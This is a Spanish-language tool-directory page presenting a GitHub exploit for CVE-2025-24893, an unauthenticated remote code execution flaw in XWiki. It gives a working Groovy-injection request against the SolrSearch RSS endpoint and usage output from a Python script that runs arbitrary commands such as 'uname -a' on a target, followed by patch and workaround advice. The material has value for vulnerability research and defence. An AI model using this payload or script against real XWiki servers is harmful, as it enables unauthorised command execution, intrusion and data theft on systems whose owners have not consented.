Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893 | Kitploit
Herramientas/GitHubGitHub/b0ysie7e/cve-2025-24893
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

Ver Repositorio
113hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit para CVE-2025-24893

CVE-2025-24893 es una vulnerabilidad crítica de ejecución remota de código (RCE) sin autenticación que afecta a la Plataforma XWiki.
Este fallo permite que cualquier usuario invitado inyecte y ejecute código Groovy arbitrario—sin autenticación—a través de una solicitud RSS especialmente diseñada al endpoint SolrSearch.

Esto afecta directamente a la confidencialidad, integridad y disponibilidad del sistema afectado.

Resumen

  • Versiones afectadas:
    • XWiki ≥ 5.3-milestone-2 hasta < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 hasta < 16.4.1
  • Puntuación CVSS v3.1: 9.8 (Crítica)
    Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Explotabilidad: Muy fácil — basta con una única solicitud HTTP GET.

⚠️ Aviso legal:

Este código está destinado estrictamente a fines educativos y de investigación únicamente. El uso no autorizado en sistemas sin permiso explícito puede constituir una infracción de la ley. El autor no se hace responsable de ningún uso indebido o actividad maliciosa que involucre esta herramienta.

Prueba de Concepto (PoC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

Manual de uso del script de exploit

Esta sección explica cómo configurar y ejecutar el script de exploit en Python para aprovechar CVE-2025-24893.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

Mitigación

Actualizar a las versiones corregidas:

Para corregir la vulnerabilidad, actualice XWiki a una de las siguientes versiones:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

Solución temporal:

Si una actualización no es posible de inmediato, puede aplicar una corrección temporal:

  1. Edite el archivo SolrSearchMacros.xml (ubicado en Main.SolrSearchMacros) alrededor de la línea 955.
  2. Reemplace la lógica de salida para usar la macro rawResponse con el tipo de contenido establecido en application/xml.
    Utilice la implementación que se encuentra en macros.vm en la línea 2824 como referencia.

Referencias:

  • NVD - CVE-2025-24893
  • Blog de Ionix
  • Miggo.io
Descargar herramienta